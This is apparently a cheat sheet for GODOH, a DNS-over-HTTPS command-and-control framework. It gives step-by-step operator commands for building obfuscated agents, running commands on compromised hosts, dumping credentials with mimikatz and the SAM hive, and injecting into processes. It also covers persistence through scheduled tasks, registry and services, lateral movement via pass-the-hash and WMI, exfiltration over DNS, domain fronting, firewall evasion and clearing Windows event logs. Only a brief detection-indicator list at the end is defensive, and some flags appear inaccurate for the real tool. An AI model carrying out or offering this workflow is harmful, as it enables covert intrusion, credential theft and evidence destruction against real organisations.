
GODOH

GODOH is a Go-based DNS-over-HTTPS (DoH) command-and-control (C2) framework. Agents communicate with the server through DNS queries carried inside HTTPS requests, which traditional network monitoring may not inspect.

Installation

Server Setup

# Clone repository
git clone https://github.com/sensepost/godoh.git
cd godoh

# Build server binary
go build -o godoh-server ./cmd/server

# Build agent binary
go build -o godoh-agent ./cmd/agent

# Alternatively, use Make
make build

Quick Start

# Start DoH server (requires DNS domain)
./godoh-server -o query.domain.com -d godoh.domain.com

# Start agent
./godoh-agent -d godoh.domain.com -c https://query.domain.com/dns-query

Server Configuration

DNS Provider Setup

# Configure for Google DoH
./godoh-server \
  -o query.domain.com \
  -d godoh.domain.com \
  -provider google

# Configure for Cloudflare DoH
./godoh-server \
  -o query.domain.com \
  -d godoh.domain.com \
  -provider cloudflare

# Custom DoH endpoint
./godoh-server \
  -o query.domain.com \
  -d godoh.domain.com \
  -doh-url https://custom.example.com/dns-query

Certificate Configuration

# Generate self-signed certificate
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

# Start with TLS
./godoh-server \
  -tls-cert cert.pem \
  -tls-key key.pem \
  -o query.domain.com

Agent Generation

Basic Agent

# Generate HTTP agent
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.google/dns-query

# Save to binary
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.google/dns-query \
  -o agent.exe

Obfuscated Agent

# Build obfuscated executable
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.cloudflare.com/dns-query \
  -obfuscate \
  -o agent.exe

Cross-Platform Compilation

# Windows 64-bit
GOOS=windows GOARCH=amd64 go build -o agent.exe ./cmd/agent

# Windows 32-bit
GOOS=windows GOARCH=386 go build -o agent.exe ./cmd/agent

# Linux x86_64
GOOS=linux GOARCH=amd64 go build -o agent ./cmd/agent

# macOS
GOOS=darwin GOARCH=amd64 go build -o agent ./cmd/agent

Agent Communications

DNS Query Encoding

# Agent sends encoded data via DNS A record queries
# Example: AAAAAA.B.godoh.domain.com

# Where:
# AAAAAA = Base32-encoded command data
# B = Sequence number
# godoh.domain.com = Domain configured in agent

DoH Protocol

# Agent makes HTTPS POST to DoH endpoint
POST /dns-query HTTP/1.1
Host: dns.google
Content-Type: application/dns-message
Content-Length: 47

[Binary DNS message payload]

Response Handling

# The server returns encoded commands in the DNS response
# The agent decodes the response and executes the commands
# The results are encoded into the agent's next DNS query

Command Execution

Shell Commands

# In agent shell
agent > execute whoami
agent > execute ipconfig /all
agent > execute tasklist /v

# PowerShell execution
agent > powershell Get-LocalUser
agent > powershell Get-Process

File Operations

# Download file from target
agent > download C:\Windows\System32\config\SAM

# Upload file to target
agent > upload /tmp/payload.exe C:\Windows\Temp\

# List directory
agent > ls C:\Users\

# Delete file
agent > rm C:\Temp\payload.exe

Process Management

# List running processes
agent > ps

# Kill process
agent > kill 1234

# Execute process
agent > execute cmd.exe /c "whoami"

# Process injection
agent > inject 1234 /tmp/shellcode.bin

Persistence Mechanisms

Scheduled Task

agent > execute schtasks /create /tn Update /tr C:\agent.exe /sc onstart /ru System

Registry Persistence

agent > execute powershell.exe -NoP -C "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Update -Value C:\agent.exe"

Service Installation

agent > execute sc.exe create AgentService binPath= "C:\agent.exe"
agent > execute sc.exe start AgentService

Lateral Movement

Credentials Harvesting

# Dump LSASS
agent > execute tasklist /v | findstr lsass
agent > execute mimikatz.exe

# Dump SAM
agent > download C:\Windows\System32\config\SAM

# Extract cached creds
agent > execute powershell.exe -NoP -C "Get-ChildItem HKCU:\Software\Microsoft\Windows NT\CurrentVersion\CredentialManager"

Lateral Access

# Pass-the-Hash
agent > execute psexec -u DOMAIN\user -p hash \\target whoami

# WMI
agent > execute wmic /node:"target" /user:"DOMAIN\user" /password:"password" process call create "cmd.exe /c powershell -nop -c IEX(...)"

# RDP
agent > rdesktop -u DOMAIN\user -p password target.local

Defense Evasion

Traffic Obfuscation

# Use legitimate DoH providers (Google, Cloudflare)
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.google/dns-query

# Blend in with normal DoH traffic
# Small query sizes reduce detection likelihood

Timing Obfuscation

# Randomize DNS query intervals
agent > sleep 3600  # 1 hour

# Add jitter to query intervals
agent > jitter 0.5  # 50% jitter on intervals

Payload Obfuscation

# Build obfuscated binary
go build -ldflags="-s -w" -o agent.exe ./cmd/agent

# Strip symbols for smaller size
strip agent.exe

Data Exfiltration

File Exfiltration

# Download sensitive files
agent > download C:\Users\Administrator\Desktop\secret.docx
agent > download C:\Windows\System32\config\SAM
agent > download C:\Windows\System32\config\SYSTEM

# Downloaded file contents are Base32-encoded and carried in DNS queries

Credential Exfiltration

# Dump and exfil credentials
agent > execute "powershell Get-Credential | Export-Clixml C:\Temp\creds.xml"
agent > download C:\Temp\creds.xml

# Exfil via small DNS chunks
# (GODOH splits large data across multiple DNS queries)

Command Output Exfiltration

# All command output is automatically exfiltrated via DNS
agent > execute dir C:\  # Output sent in DNS responses

# Large outputs are chunked:
# the server splits them into 255-character DNS TXT records
# and the agent reassembles the pieces from the responses

Monitoring and Operations

Session Management

# List active agents
server > agents

# Interact with specific agent
server > agent <agent_id>

# Send command to agent
server > task execute whoami

# Check agent status
server > status <agent_id>

Log Review

# Enable verbose logging
./godoh-server -v -d godoh.domain.com

# Monitor incoming queries
./godoh-server -log /tmp/godoh.log -d godoh.domain.com

# Check DNS query patterns
tail -f /tmp/godoh.log | grep "DNS Query"

Performance Optimization

# Adjust buffer sizes for slow connections
./godoh-server \
  -buffer-size 512 \
  -d godoh.domain.com

# Increase timeout for unreliable networks
./godoh-agent \
  -d godoh.domain.com \
  -timeout 30s

Advanced Configuration

Domain Fronting

# Use legitimate domain for DoH endpoint
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.google/dns-query \
  -host-header google.com

# Hides true C2 domain in SNI/Host header

Multi-Domain Setup

# Configure multiple fallback domains
./godoh-agent \
  -d primary.domain.com,secondary.domain.com,tertiary.domain.com \
  -c https://dns.google/dns-query

# Rotates between domains for resilience

Custom DNS Server

# Run internal DNS server
./godoh-dns-server -d godoh.domain.com

# Route queries to custom server
./godoh-agent \
  -d godoh.domain.com \
  -nameserver 192.168.1.10:53

Troubleshooting

Connectivity Issues

# Test DNS resolution
nslookup test.godoh.domain.com

# Test DoH endpoint
curl -X POST https://dns.google/dns-query \
  -H "Content-Type: application/dns-message"

# Enable debug logging
./godoh-agent -debug -d godoh.domain.com

Slow Transfers

# Increase query rate
./godoh-agent \
  -d godoh.domain.com \
  -rate 100  # 100 queries per second

# Reduce data encoding overhead
./godoh-agent -compression gzip

Firewall Blocking

# If the standard DoH endpoint is blocked, use an alternative endpoint
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.quad9.net/dns-query

# Alternative: use TCP port 853 (the port assigned to DNS-over-TLS)
./godoh-server -tcp -port 853

Detection and Cleanup

Remove Agent

# Remove scheduled task
agent > execute schtasks /delete /tn Update /f

# Remove registry entry
agent > execute powershell.exe -NoP -C "Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Update"

# Delete agent binary
agent > rm C:\Windows\Temp\agent.exe

Clear Logs

# Clear Windows Event Log
agent > execute wevtutil cl System
agent > execute wevtutil cl Security
agent > execute wevtutil cl Application

# Clear DNS cache
agent > execute ipconfig /flushdns

Best Practices

  • Use legitimate DoH providers to blend with normal traffic
  • Implement DNS query randomization
  • Rotate domains regularly
  • Monitor for unusual DNS patterns
  • Use encryption for additional obfuscation
  • Implement proper OPSEC during operations
  • Clean up all artifacts post-operation

Detection Indicators

  • Unusual DNS query volume from a single host
  • Sustained DoH traffic to endpoints not normally used in the environment
  • Long, high-entropy subdomain labels (Base32/Base64-encoded data in DNS names)
  • Regular, beacon-like DNS query timing
  • Outbound HTTPS traffic on port 443 to unexpected IPs

References